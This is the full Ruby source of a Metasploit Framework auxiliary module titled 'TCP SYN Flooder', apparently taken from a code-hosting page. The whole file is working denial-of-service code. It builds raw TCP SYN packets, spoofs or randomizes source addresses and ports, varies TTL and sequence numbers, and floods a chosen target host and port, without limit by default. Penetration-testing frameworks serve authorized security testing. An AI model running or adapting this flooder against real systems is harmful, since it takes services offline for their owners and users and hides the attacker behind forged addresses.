metasploit-framework/modules/auxiliary/dos/tcp/synflood.rb

72 lines
1.5 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'TCP SYN Flooder',
'Description' => 'A simple TCP SYN flooder',
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE
)
register_options([
Opt::RPORT(80),
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
])
deregister_options('FILTER','PCAPFILE')
end
def sport
datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i
end
def rport
datastore['RPORT'].to_i
end
def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
end
def run
open_pcap
sent = 0
num = datastore['NUM']
print_status("SYN flooding #{rhost}:#{rport}...")
p = PacketFu::TCPPacket.new
p.ip_saddr = srchost
p.ip_daddr = rhost
p.tcp_dport = rport
p.tcp_flags.syn = 1
while (num <= 0) or (sent < num)
p.ip_ttl = rand(128)+128
p.tcp_win = rand(4096)+1
p.tcp_sport = sport
p.tcp_seq = rand(0x100000000)
p.recalc
capture_sendto(p,rhost)
sent += 1
end
close_pcap
end
end